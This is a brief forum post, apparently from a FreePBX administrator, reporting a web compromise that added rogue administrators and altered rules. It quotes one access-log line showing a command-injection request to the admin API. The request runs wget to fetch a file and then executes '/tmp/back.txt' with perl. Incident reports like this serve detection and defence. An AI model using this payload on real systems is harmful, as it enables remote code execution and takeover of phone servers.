Successful web attack to my freepbx host

Now i view new addministrators at webgiu and many edited rules in freepbx latest update…

string from access_log: - - [03/Apr/2014:13:11:41 +0400] “GET /admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=wget%20http://;perl%20/tmp/back.txt; HTTP/1.1” 200 197 “*111” "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

full log may email to you, if you need.

Thanks! Already update all servers. Maybe, need httpd basic auth?